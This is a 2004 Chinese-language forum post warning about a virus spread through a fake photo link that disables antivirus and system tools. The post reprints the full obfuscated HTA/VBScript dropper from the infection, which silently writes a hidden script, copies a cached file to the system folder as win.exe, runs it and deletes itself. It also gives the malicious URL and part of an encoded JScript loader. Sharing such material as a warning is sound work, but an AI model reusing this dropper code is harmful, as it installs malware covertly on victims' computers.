史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > 應用軟體使用技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2004-02-27, 06:24 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 美女圖片隱藏病毒 導致多種軟體無法執行?

2月27日,全球反病毒監測網率先截獲一個通過圖片連接位址傳播的惡性病毒,用戶只要點擊:http://qianhui.9966.org/zhaopian/me.jpg網址,會出現一副美女圖片,有些中毒的用戶會出現殺毒軟體、OFFICE軟體、工作管理器、各種專殺工具等無法執行、且無法登入殺毒公司網址等現象。
  據瞭解,該病毒可能是「傳奇女賊」病毒的一個最新變種,已經在網路上快速氾濫,並且有大量用戶中招,如果用戶點擊該連接則會出現一幅美女圖片,因此反病毒專家強烈建議用戶,遇到該連接位址時不要點擊。

專殺工具:http://dl.pconline.com.cn/html/1/4/dlid=12344&dltypeid=1&pn=0&.html

惡意程式碼中招...例子
一個朋友電腦上的機器一直沒昇級,今天一上網看了別人發來的網站,看了就中招了,現在連工作管理器都打不開了,哪位朋友知道如何解決的,現在已經把C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files這個目錄中的win.exe刪除了,但還是沒用。這傢伙是做的一個HTA程序,程式碼如下:

<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<HTA:APPLICATION caption="no" border="none" visiable="no" windowState="minimize" >
<ript LaNGUAGE="VBScript.Encode">
window.moveTo -100,-100
Set g_fs = CreateObject("Scripting.FileSystemObject")
Set tf = g_fs.CreateTextFile("c:\isp.hta",true)
tf.write "<HTA:APPLICATION caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" & CHR(34)& " visiable=" & CHR(34)& "no" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& " >" &chr(13)&chr(10)
tf.write "<object id='wsh' cl"& chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10)
tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10)
tf.write "on error resume next"&chr(13)&chr(10)
tf.write "window.moveTo -100,-100"&chr(13)&chr(10)
tf.write "window.resizeTo 0,0 "&chr(13)&chr(10)
tf.write "dim exepath"&chr(13)&chr(10)
tf.write "Function Search(objFolder) "&chr(13)&chr(10)
tf.write "Dim objSubFolder"&chr(13)&chr(10)
tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10)
tf.write "If InStr(1, objfile.name, " & CHR(34)& "winups" & CHR(34)& ", vbtextcompare) then"&chr(13)&chr(10)
tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10)
tf.write "filecp.copy (exepath)"&chr(13)&chr(10)
tf.write "exit for"&chr(13)&chr(10)
tf.write "End If"&chr(13)&chr(10)
tf.write "Next "&chr(13)&chr(10)
tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10)
tf.write "Search objSubFolder"&chr(13)&chr(10)
tf.write "Next"&chr(13)&chr(10)
tf.write "End Function"&chr(13)&chr(10)
tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)& ")"&chr(13)&chr(10)
tf.write "str=WSH.regread(" & CHR(34)& "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"&chr(13)&chr(10)
tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10)
tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10)
tf.write "exepath=othisfolder.path & "& chr(34) & "\win.exe" & chr(34) &chr(13)&chr(10)
tf.write "search tempfolder"&chr(13)&chr(10)
tf.write "wsh.run (exepath)"&chr(13)&chr(10)
tf.write "wsh.run " & CHR(34)& "command.com /c del c:\isp.hta" & CHR(34)& " ,0"&chr(13)&chr(10)
tf.write "window.close()"&chr(13)&chr(10)
tf.write "<" &chr(47)& "script>"&chr(13)&chr(10)
tf.close
wsh.run "c:\isp.hta",0
window.close ()
</script>
開啟後,首先是網路防火牆要求有資料要通過,禁了,跳出的頁不知道是啥,然後就是病毒防火發現了.....
掃瞄類型: 既時防護 掃瞄
事件: 已發現病毒!
病毒名稱: VBS.StartPage
文件: G:\Temporary Internet Files\Content.IE5\AP38X0JA\hello[1].hta
位置:隔離區
電腦:2K3
用戶:Administrator
採用的操作:清除 失敗 : 隔離 成功 : 拒絕訪問
發現的日期: Fri Feb 27 17:57:46 2004
http://qianhui.9966.org/zhaopian/me.jpg 這根本不是個圖片,內容如下:
一個不太好看的MM照片...好像是裝了xp sp1 ,都不會有問題






PHP程式碼:---------------------------------------------------------------------
<html>
<head>
<<img src="images/smilies/greenconfused.gif" border="0" alt="">ript language="JScript.Encode">#@~^xQEAAA==@#@&................................~@</script>
</head>
<body>
</body>
</html>
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 02:59 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1